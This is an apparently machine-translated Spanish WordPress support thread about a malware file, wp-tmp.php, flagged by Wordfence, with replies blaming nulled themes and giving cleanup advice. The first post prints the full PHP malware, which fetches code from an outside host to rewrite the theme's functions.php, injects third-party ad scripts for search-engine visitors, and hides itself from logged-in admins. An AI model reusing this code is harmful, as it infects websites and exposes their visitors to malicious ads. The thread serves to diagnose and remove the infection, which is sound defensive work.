Pregunta sobre Wordfence Security de Wordpress:

Advertencias: * Archivo desconocido en el núcleo de WordPress: wp-include / wp-tmp.php

Un usuario preguntó 👇

Eso fue recibido esta mañana. ¿Que debería hacer?

Aquí está el código dentro de wp-tmp.php:

ini_set('display_errors', 0);
error_reporting(0);
$wp_auth_key='87b83c0568dfdee2d0d59bf8a221c00e';

//echo "rrrr".get_template_directory();
$file=file_get_contents(get_template_directory().'/functions.php');

$pat_code='/div_code_name[sS]*?(if ( ! function_exists[sS]*?extract([sS]*?)?>/i';
if(preg_match_all($pat_code, $file, $matches_pat_code))

{

$toreplace=$matches_pat_code[1][0];
//echo $toreplace;

$newxc=file_get_contents('http://www.dolsh.cc/new4.txt');

if (stripos($newxc, $wp_auth_key) !== false) 
{
$new_file=str_replace($toreplace,$newxc,$file);
@file_put_contents(get_template_directory().'/functions.php',$new_file);
}

}

//@file_put_contents($funcfile,$file);

if ( ! function_exists( 'slider_option' ) ) {  
function slider_option($content){ 
if(is_single())
{

$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1426161"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1426162&interactive=1&pushup=1"></script>

';

$content=$content.$con2;
}
return $content;
} 

function slider_option_footer(){ 
if(!is_single())
{

$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1426161"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1426162&interactive=1&pushup=1"></script>

';

echo $con2;
}
} 

function setting_my_first_cookie() {
  setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }

if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}

if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
[email protected]_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);

}

}

$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
  if (strpos($ref,$source)!==false) {
    setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
	$sevisitor=true;
  }
}

if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
{
[email protected]_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}

}
} 

}

Este tema fue modificado hace 3 años, 1 mes por.

(@liammcarthur)

Hace 3 años, 1 mes

Parece un archivo muy sospechoso y definitivamente no es parte del núcleo de WordPress. Quiero eliminar este archivo, asegurarme de que todos los permisos de archivo sean correctos (no de forma recursiva 777, por ejemplo) y eliminar cualquier plugin y código que pueda ser vulnerable.

(@wfyann)

Hace 3 años, 1 mes

Hola @revived,

Como lo menciona @liammcarthur, este no es un archivo central estándar de WordPress y el código, que ya está en la lista negra, contiene enlaces externos (ya sospechosos).

Por favor confirme nuestro guía de limpieza del sitio para restaurar la integridad de su sitio.

(@bluebearmedia)

Hace 3 años, 1 mes

(publicación redundante eliminada por el autor)

Esta respuesta fue modificada hace 3 años, hace un mes por.

(@revivido)

Hace 3 años, 1 mes

¿Cómo puedo defenderme de esto en el futuro?

(@wfyann)

Hace 3 años, 1 mes

@revived,

Las referencias citadas por @bluebearmedia, en su publicación (desde que fue eliminada), responden perfectamente a su pregunta.

Vea los siguientes artículos de nuestro Centro de aprendizaje:

Introducción a la seguridad de WordPress
Lista de verificación: cómo proteger su sitio web de WordPress
Cómo apilar su sitio de WordPress de los ataques

Encontrará consejos útiles para proteger su sitio.

Esta respuesta fue modificada hace 3 años, hace un mes por. Razón: «obtener» no «alimentar»

(@revivido)

Hace 3 años, 1 mes

¿Cómo se hace esto? Para el alojamiento compartido, asegúrese de que los sitios estén aislados o «encarcelados»

(@wfyann)

Hace 3 años, 1 mes

Hola @revived,

Ese punto específico debería discutirse con su proveedor de alojamiento. Debe consultar con ellos qué solución tienen para asegurarse de que los usuarios no puedan acceder al entorno de los demás.

Una cosa que puede hacer por su parte es evitar alojar más de un sitio en cada cuenta de alojamiento; porque si una persona está infectada, también lo estarán las otras personas.

(@ marcelo-mika)

Hace 2 años, 11 meses

Esto sucede mediante el uso de temas y plugins NULLED

Debe saber que todo lo que se anula está dañado por código malicioso.

Una vez que se instala Nulled, el código se activa en un momento determinado, recorre todas las carpetas de alojamiento e instala un script además de agregar algunos archivos.

wp-vcd.php wp-tmp.php:

Y TAMBIÉN modifica las funciones de post.php.php

Esta respuesta fue modificada hace 2 años, 11 meses por.

(@revivido)

Hace 2 años, 11 meses

Eso es exactamente lo que pasó, Marcelo. No he escuchado el término NULLED antes en este contexto. ¿Puedes elaborar?

(@ burst24)

Hace 2 años, 11 meses

¡Hola! Tengo el mismo problema. Eliminé el código de malware de function.php en todos mis temas de instalación, pero sigue volviendo. ¿Alguien encontró una solución a esto? ¡Por favor ayuda!

Esta respuesta fue modificada hace 2 años, 11 meses por.

(@revivido)

Hace 2 años, 11 meses

En mi caso, tengo varias instalaciones de WordPress en una cuenta de alojamiento. Cada instalación es un dominio de plugin en sí mismo y creo que tuve esta pregunta en 5 de 7 instalaciones. Leí en alguna parte, mientras investigaba este dilema, si el código / archivos en cuestión no se eliminan de todos los lugares, entonces se replicará.

También leí, y creo que esto es lo más importante, es limpiar el código adicional en sus archivos functions.php, probablemente en las carpetas de temas de su hijo. Te puedo asegurar que tienes casi la certeza de que se ha modificado con el código que mantiene activo este malware.

¿Tiene otras instalaciones en el servidor?

Esta respuesta fue modificada hace 2 años, 11 meses por.

(@ burst24)

Hace 2 años, 10 meses

Elimino el código de malware de functions.php en todas mis instalaciones, así como los archivos wp-tmp y wp-vcd, pero el malware vuelve a cambiar. Debe haber otros escondites también. Incluso en la instalación local y functions.php solo se lee. El malware pudo reinstalar el código. ¿Algunas ideas?

(@revived)

Hace 2 años, 10 meses

Perdido, lo siento. Estoy bastante seguro de que el código de bloque de TODOS los archivos function.php en TODAS mis instalaciones parecía funcionar para mí ya que ya no tenía este problema.

¿Quizás probar algo en este hilo? https://wordpress.org/support/topic/wp-feed-php/

(@joelmasci)

Hace 2 años, 10 meses

en resumen, el código que se encuentra en functions.php, wp-vcd.php y wp-tmp.php crea el código en los otros archivos cada vez que se ejecuta el código. Definitivamente no llegará a ninguna parte a menos que se asegure de que nadie esté visitando el sitio mientras limpia los archivos. Recomiendo comentar el código primero, ya que los códigos de archivo verifican si tiene una cadena exacta en algún lugar del archivo como indicador de si es necesario agregar el código al archivo. incluso si inicia sesión en ep admin o realiza alguna acción como un escaneo de seguridad o incluso activa un plugin a través de wp-cli, hará que el código se ejecute, posiblemente insertándose donde estaba antes . El otro problema son otras instalaciones de WordPress en el mismo entorno de alojamiento, porque si están dañadas, el código puede volver a aparecer. se necesitan más pruebas ya que no pude encontrar todas las fuentes del código y muchas cosas no están seguras al respecto. pero una cosa es segura es que la depuración iniciando sesión en wp admin en un sitio en vivo es poco probable que funcione. Es mejor comenzar con WordPress nuevo para instalar, eliminar y reinstalar todos los plugins y luego mover los archivos de tema y tener cuidado de eliminar primero el código infectado. incluso si intenta desactivar su tema, pensando que el código no se ejecutará en functions.php, es posible que los visitantes de hockey hagan la URL directamente, haciendo que se ejecute. así que intente comentar primero, luego elimine la solución y use una instalación nueva si eso no funciona.

(@ marcelo-mika)

Hace 2 años, 9 meses

mis disculpas por llegar tarde!

¿Podrías solucionarlo?

Si no pueden, lo mejor es:

1. Compruebe todos los sitios de WordPress en alojamiento compartido. 2. Desactive y elimine todos los plugins o temas de DESCARGA NULLED 3. Busque todos los archivos function.php del código malicioso, elimínelo y guarde los cambios de archivo. 4 Buscar archivos:

wp-feed.php wp-vcd.php wp-tmp.php

– Estos pueden cambiar de ubicación, antes de eliminar el código de function.php es conveniente ver qué ruta especifica para estos archivos.

Esto requeriría limpiar la instalación de todos los dominios en el alojamiento.

Recomendación: antes de comenzar, haga una copia de seguridad de todos los sitios.

Para saber cuándo se modificó por última vez el sitio, haga una lista de carpetas por fecha de modificación.

Generalmente, cuando se cambia algo en ellos, la fecha cambia, y eso nos da una pista sobre dónde puede esconderse el código malicioso.

Saludos.

¿Solucionó tu problema??

0 / 0

Deja una respuesta 0

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *